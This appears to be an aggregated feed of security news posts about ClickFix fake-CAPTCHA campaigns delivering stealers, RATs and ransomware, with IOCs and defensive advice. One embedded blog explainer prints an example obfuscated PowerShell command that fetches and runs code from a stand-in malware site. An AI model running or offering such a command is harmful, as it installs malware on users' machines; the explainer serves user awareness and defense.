Awakari App

Cloudflare-Themed ClickFix Attack Drops Infiniti Stealer on Macs The infection chain includes a fake CAPTCHA page, a Bash script, a Nuitka loader, and the Python-based infostealer. The post Cloudfl...

#Malware #& #Threats #ClickFix #infostealer #Mac #malware

Origin | Interest | Match

Beware of the SmartApeSG campaign using ClickFix to deploy multiple malware strains like Remcos RAT and StealC. Stay vigilant and educate users on social engineering tactics. #CyberSecurity #MalwareAlert #ClickFix Link: thedailytechfeed.com/smartapesg-c...

LeakNet Ransomware Uses ClickFix and Deno for Stealthy Attacks  LeakNet ransomware has changed its approach by pairing ClickFix social-engineering lures with a Deno-based loader, making its intrusion chain harder to spot. The group is using compromised websites to trick users into running malicious commands, then executing payloads in memory to reduce obvious traces on disk.  Security researchers say this is a notable shift because ClickFix replaces older access methods like stolen credentials with a user-triggered infection path. Once the victim interacts with the fake prompt, scripts such as PowerShell and VBS can launch the next stage, often with misleading file names that look routine rather than malicious.  The Deno runtime is the second major piece of the campaign. Deno is a legitimate JavaScript and TypeScript runtime, but LeakNet is abusing it in a “bring your own runtime” style so it can run Base64-encoded code directly in memory, fingerprint the host, contact command-and-control servers, and repeatedly fetch additional code.  That design helps the attackers stay stealthy because it minimizes the amount of malware written to disk and can blend in with normal software activity better than a custom loader might. Researchers also note that LeakNet is building a repeatable post-exploitation flow that can include lateral movement, payload staging, and eventually ransomware deployment.  For organizations, the primary threat is that traditional file-based detection may miss the earliest stages of the attack. A campaign that starts with a convincing browser prompt or a fake verification page can quickly turn into an internal breach if users are not trained to question unexpected instructions.  Safety recommendations  To mitigate threat, companies should train users to avoid following browser-based “fix” prompts, especially on unfamiliar or compromised sites. They should also restrict PowerShell, VBS, and other script interpreters where possible, monitor for Deno running outside developer workflows, watch for unusual PsExec or DLL sideloading activity, and segment networks so one compromised host cannot easily spread access. Finally, maintain tested offline backups and keep a playbook for rapid isolation, because fast containment is often the difference between a blocked intrusion and a full ransomware incident.

LeakNet Ransomware Uses ClickFix and Deno for Stealthy Attacks #ClickFix #CyberAttacks #Deno

"EtherRAT & SYS_INFO Module: C2 on Ethereum (EtherHiding), Target Selection, CDN-Like Beacons" published by eSentire. #ClickFix, #EtherHiding, #EtherRAT, #DPRK, #CTI www.esentire.com/blog/etherrat-sys-info-m...

ClickFix Campaigns Targeting Windows and macOS Insikt Group tracked five ClickFix clusters that use fraudulent human‑verification lures to trick victims into copying and executing obfuscated commands in native tools like the Windows Run dialog and macOS Terminal. These campaigns leverage living‑off‑the‑land binaries and in‑memory execution to stage payloads such as NetSupport RAT and MacSync while operating via disposable, often Cloudflare‑protected infrastructure to maintain continuity. #ClickFix #NetSupportRAT

Insikt Group tracks five ClickFix clusters using fake human-verification lures to run obfuscated commands on Windows and macOS. Payloads include NetSupport RAT and MacSync via in-memory execution. #ClickFix #InMemoryAttack #USA

ClickFix Campaigns Target Win/macOS

~Recordedfuture~
Fake verification prompts trick users into running malicious commands via native tools, bypassing browser security to deploy RATs.
-
IOCs: 62. 164. 177. 230, 152. 89. 244. 70, 45. 144. 233. 192
-
#ClickFix #Malware #ThreatIntel

Your WordPress site looks clean to you. Your visitors see a fake Cloudflare CAPTCHA telling them to run PowerShell. That's ClickFix.

Runbook:
https://go.enginyr.ing/spn/dzlEH

#ServerSpan #WordPress #CyberSecurity #Malware #ClickFix #SysAdmin #VPS

"NICKEL ALLEY strategy: Fake it ‘til you make it" published by Sophos. #NickelAlley, #ClickFix, #ContagiousInterview, #PylangGhost, #DPRK, #CTI www.sophos.com/en-us/blog/nickel-alley-...

NICKEL ALLEY Fake Job Campaigns

~Sophos~
DPRK's NICKEL ALLEY targets tech workers with fake job interviews and ClickFix tactics to deploy PyLangGhost RAT.
-
IOCs: 95. 169. 180. 140, 144. 172. 93. 88, talentacq. pro
-
#ClickFix #NICKELALLEY #ThreatIntel

Termite Ransomware Linked to Velvet Tempest's ClickFix, CastleRAT Attacks  Cyber threat actors known as Velvet Tempest have been observed deploying sophisticated attacks involving Termite ransomware, utilizing the ClickFix social engineering technique and the CastleRAT backdoor.These intrusions, tracked by MalBeacon researchers, unfolded over 12 days in a simulated U.S. non-profit environment with over 3,000 endpoints.Velvet Tempest, active for at least five years, has affiliations with major ransomware strains like Ryuk, REvil, Conti, BlackCat, LockBit, and RansomHub.  The attacks begin with malvertising campaigns directing victims to fake CAPTCHA pages that trick users into pasting obfuscated PowerShell commands into the Windows Run dialog This ClickFix method bypasses browser security features, chaining cmd.exe processes and using legitimate tools like finger.exe to fetch malware loaders, often disguised as PDF archives.Subsequent stages involve PowerShell downloads, .NET compilation via csc.exe, and Python-based persistence in ProgramData directories.  Once inside, attackers conduct Active Directory reconnaissance, host discovery, and credential harvesting from Chrome browsers using hosted PowerShell scripts linked to Termite staging servers. They deploy DonutLoader to retrieve CastleRAT, a remote access trojan that steals credentials, logs keystrokes, captures screens, and employs UAC bypass via trusted binaries like ComputerDefaults.exe. CastleRAT hides its command-and-control servers using Steam Community profiles as dead-drop resolvers, blending traffic with legitimate web activity.  Although ransomware deployment was not observed in this intrusion, Termite—a Babuk-based variant emerged in late 2024—employs double-extortion by exfiltrating data before encrypting files. It deletes shadow copies with vssadmin.exe, empties the Recycle Bin, and targets high-profile victims like SaaS provider Blue Yonder and Australian IVF firm Genea. The group exploits vulnerabilities, such as those in Cleo's file transfer software, for initial access via phishing or compromised sites.  Organizations should prioritize defenses against ClickFix by training users on suspicious prompts, monitoring PowerShell abuse, and blocking anomalous tool executions like finger.exe or csc.exe. Implementing deception environments, as used by MalBeacon, aids early detection of such hands-on-keyboard activities. With Velvet Tempest's history of devastating breaches, vigilance against evolving ransomware tactics remains critical in 2026.

Termite Ransomware Linked to Velvet Tempest's ClickFix, CastleRAT Attacks #CastleRAT #ClickFix #CyberAttacks

Fake CAPTCHA Campaign: Inside a Multi-Stage Stealer Assault LevelBlue documents a multi-stage, fileless ClickFix campaign that compromises legitimate websites to present fake CAPTCHA prompts which coerce users into executing clipboard-pasted PowerShell commands, enabling in-memory payload delivery via Donut shellcode. The infrastructure is payload-agnostic and rotates multiple commodity stealers and a cryptocurrency clipboard hijacker across numerous C2 servers and fake crypto-exchange sites. #ClickFix #LummaStealer

A multi-stage stealer attack uses compromised legitimate sites to show fake CAPTCHA prompts, tricking users into running clipboard-pasted PowerShell commands delivering in-memory payloads via Donut shellcode. #ClickFix #CryptoHijack #LummaStealer

LeakNet escalates ransomware attacks using ClickFix lures and a stealthy Deno-based loader, challenging traditional cybersecurity defenses. #CyberSecurity #Ransomware #LeakNet #ClickFix #DenoLoader Link: thedailytechfeed.com/leaknet-ampl...

LeakNet ransomware adopts ClickFix tactics and Deno in-memory loaders for stealthy attacks. Stay vigilant against evolving cyber threats. #CyberSecurity #Ransomware #ClickFix #Deno Link: thedailytechfeed.com/leaknet-rans...

LeakNet ransomware uses ClickFix and Deno runtime for stealthy attacks The LeakNet ransomware gang is now using the ClickFix technique for initial access into corporate environments and deploys a malware loader based on the open-source Deno runtime for JavaScript and TypeScript.

#LeakNet #ransomware uses #ClickFix, #Deno runtime in stealthy attacks

www.bleepingcomputer.com/news/security/leaknet-ra...

#cybersecurity

New ClickFix Scam Tricks Users Into Mapping Hacker-Controlled Drives A new ClickFix scam tricks Windows users into running hidden commands that map hacker-controlled drives and load malware through trusted apps.

Watch out as a new ClickFix scam tricks Windows users into running hidden commands that map hacker-controlled drives and load malware through trusted apps.

Read: hackread.com/clickfix-sca...

#CyberSecurity #ClickFix #Windows #Malware #Scam

LeakNet Ransomware Uses ClickFix via Hacked Sites Deploys Deno In-Memory Loader defenders something tangible to work with read more about LeakNet Ransomware Uses ClickFix via Hacked Sites Deploys Deno In-Memory Loader

LeakNet Ransomware Uses ClickFix via Hacked Sites Deploys Deno In-Memory Loader reconbee.com/leaknet-rans...

#LeakNetransomware #ransomwareattack #ClickFix #hacked #cybersecurity #cyberattack

LeakNet Ransomware Uses ClickFix via Hacked Sites, Deploys Deno In-Memory Loader The ransomware operation known as LeakNet has adopted the ClickFix social engineering tactic delivered through compromised websites as an initial access method. The use of ClickFix, where users are tricked into manually running malicious commands to address non-existent errors, is a departure from relying on traditional methods for obtaining initial access, such as through stolen credentials

iT4iNT SERVER LeakNet Ransomware Uses ClickFix via Hacked Sites, Deploys Deno In-Memory Loader VDS VPS Cloud #Ransomware #CyberSecurity #LeakNet #ClickFix #Malware

ClickFix Attack Targets Devs with MacSync Malware via Fake Claude Tools Cybersecurity researchers at 7AI have revealed a new Claude Fraud campaign in which hackers use fake AI extensions and Google ads to steal data from tech professionals.

Watch out as hackers are abusing fake Claude AI tools in a #ClickFix campaign to spread MacSync infostealer malware via #GoogleAds.

Read: hackread.com/clickfix-att...

#CyberSecurity #Infostealer #AI #Claude #MacOS

Original post on securityaffairs.com

From Windows to macOS: ClickFix attacks shift tactics with ChatGPT-based lures ClickFix campaigns are evolving, with attackers increasingly targeting macOS users and deploying more advanced infoste...

#Artificial #Intelligence #Breaking #News #Cyber […]

[Original post on securityaffairs.com]

Cyberattackers have evolved the ClickFix technique, exploiting network drives and Electron apps to deploy malware. Stay informed and protect your systems. #CyberSecurity #ClickFix #MalwareAlert Link: thedailytechfeed.com/advanced-cli...

A 'Free Photoshop' scam on #TikTok is stealing people's data: zorz.it/OABup

#JeremyGray #FreePhotoshop #AdobePhotoshop #ClickFix #CyberCriminals #Microsoft #Photoshop #scam #SocialMedia

MacOS-Nutzer verstärkt im Visier von Social-Engineering-Attacken

#Authentifizierung #ClickFix #Cybersecurity #Cybersicherheit #GenAI #MacOS #Phishing #SocialEngineering @Sophos @Sophos_info

netzpalaver.de/2026/...

Mac users, beware! Fake CAPTCHAs are tricking users into running malicious Terminal commands. Stay vigilant and never execute commands from untrusted sources. #CyberSecurity #MacOS #ClickFix Link: thedailytechfeed.com/fake-captcha...

ClickFix Campaigns Target macOS with MacSync Stealer

~Sophos~
Attackers use fake ChatGPT lures and ClickFix tactics to trick macOS users into installing the MacSync infostealer, targeting crypto wallets.
-
IOCs: mymachub. com, mymacsoft. com, mac-faster. com
-
#ClickFix #Infostealer #ThreatIntel #macOS

Vermeintlich von Google gesponserte Online-Anzeigen für Anthropics Claude-Code bereiten den Weg für Malware

#Anthropic @Bitdefender_DE #ClaudeCode #ClickFix #Cybersecurity #Cybersicherheit #Malware @Bitdefender

netzpalaver.de/2026/...

VodkaStealer Malware Harvests Browser Credentials and Session Token Threat Group – Unidentified financially motivated threat actor associated with the ClickFix WordPress compromise campaign Threa...

#Malware #ClickFix #Credential #Theft

Origin | Interest | Match

Hackers Turn Trusted Websites Into Malware Launchpads Over 250 compromised WordPress websites are distributing infostealer malware through fake security prompts in a global attack targeting users in 12 countries.

Hackers Turn Trusted Websites Into Malware Launchpads

#Cybersecurity #Malware #WordPress #ClickFix #AusNews

thedailyperspective.org/article/2026-03-10-hacke...

Fixing ClickFix There’s a very potent, very effective new malware delivery mechanism dubbed ClickFix, accounting for over half of all infections last year. I’ll tell you how to avoid it – and why you shouldn’t have to. ## What is ClickFix? We’re getting used to seeing CAPTCHAs that make us do weird things to prove that we’re real humans. (This is becoming increasingly ironic as we deploy “agentic” AI bots to do things on our behalves.) But the bad guys have come up with a devilishly clever way to exploit this and similar situations to trick us into installing malware. The attack is called “ClickFix”, though there are other variants. So, how does this work? The bad guys need to get you to a malicious web page. This can happen in many ways, from clicking on a malicious ad (called “malvertising”), or a “sponsored” link in search results, or a link from a phishing email – either in the email itself or in an attached file. You may also run across scams like this on shady sites, like for pirated software or movies. But however you get there, you will see some sort of message or error along these lines: * Please verify that you’re a human (CAPTCHA) * Browser verification failed * Additional verification required * Please run this command to continue * App has crashed, run this command to scan for problems or fix the issue An actual ClickFix example is shown below. Actual ClickFix example ## How ClickFix Works When you’re in a web browser on a desktop computer, you have several layers of protection. Browsers are “sandboxed” and can’t directly run commands on your computer. Most have some sort of download protections, including marking any file downloaded from the internet with a “mark of the web“. This mark tells your computer to be extra careful when opening these documents, particularly if they try to install something or run commands. And some of us have third party antivirus software (though I don’t recommend this) that would also try to prevent you from downloading malware. But ClickFix works by tricking you into bypassing all of these protections. Let’s look at the example above. Here’s what is actually going on. 1. The malicious web page that shows this message has automatically loaded your system clipboard with a computer command. That is, the page has surreptitiously copied some hidden text so that it’s ready to paste. 2. The “Win + R” key combination on a Windows computer will open up a Run dialog which allows you to execute commands as text (as opposed to the usual graphical user interface). 3. The “Ctrl + V” key combination will paste the contents of the clipboard into the Run dialog. This is the malicious computer command that was pre-copied to the clipboard when you visited the attacker’s web page. 4. And finally, hitting “Enter” will tell your computer to execute the malicious command. The command itself is often obfuscated so it’s difficult to tell what it’s really doing. Here’s an example command: powershell -NoP -W Hidden -C $a="https://mal"; $b="waresite.com/update"; $u=$a+$b; iex (irm $u) # browser verification step This command opens a (hidden) PowerShell window, downloads a malicious command from a website (which is obfuscated by breaking it into two parts) and executes the command. You’ve just told your computer to install malware, which it will happily do. If the command is really long, like this one, it will scroll to the end and all you might see is the benign-looking comment at the end. You might also be asked to open File Explorer because you can paste and run commands in the address bar. On a Mac, you’d be asked to open a Terminal window instead of a Run dialog. All different ways to do the same thing. ## Fixing ClickFix So, now that you know how this works, the solution is to just ignore the directions like this, no matter how authentic they look or how dire or innocuous they sound. Close the web page and pat yourself on the back. But here’s the bottom line: you shouldn’t _have_ to worry about this. This is a failing of the operating system (OS). Apple and Microsoft need to address this problem in macOS and Windows, and they should do it ASAP. How? I can think of a few ideas… 1. Everything copied to the clipboard (anything that can be subsequently pasted) should know and remember where it came from. Any text placed on your clipboard by a website should be flagged as suspicious (like the ‘mark of the web’). Your OS should then warn you before pasting this text into a Run dialog, Terminal window, or anywhere else that could execute a computer command. 2. You should have an easy way to inspect the content of your clipboard (without having to paste it somewhere), including the provenance of what’s stored there. 3. Web browsers should not be able to automatically put text on your clipboard without any user action whatsoever. It should at least be a setting you can toggle (defaulting to not allowing it). People that do a lot of computer programming copy and paste commands to run all the time. I know I do. So we would need some ways to disable constant warnings in those cases, maybe for a limited amount of time (‘stop warning me for 2 hours’). But by default, the OS should be making it a lot harder to paste commands from the web into a terminal and execute them. We should not be counting on training billions of people to avoid ClickFix-style attacks. #### Need practical security tips? Sign up to receive Carey's favorite security tips + the first chapter of his book, _Firewalls Don't Stop Dragons_. Don't get caught with your drawbridge down! **Get started**

Fixing #ClickFix

https://firewallsdontstopdragons.com/fixing-clickfix/

#cybersecurity #guide

New ClickFix Attack Wave Targeting Windows Systems to Deploy StealC Stealer Fake CAPTCHA pages trick Windows users into running PowerShell, deploying StealC malware to steal sensitive data.

🚨 Cross-scripted FAKE CAPTCHA launches #StealC malware exploit:

"This #ClickFix technique exploits user trust, making victims believe they are completing a routine security check when they are actually launching malware."

cybersecuritynews.com/new-clickfix...

Termite ransomware breaches linked to ClickFix CastleRAT attacks Ransomware threat actors tracked as Velvet Tempest are using the ClickFix technique and legitimate Windows utilities to deploy the DonutLoader malware and the CastleRAT backdoor.

#Termite #ransomware breaches linked to #ClickFix #CastleRAT attacks

www.bleepingcomputer.com/news/security/termite-ra...

#cybersecurity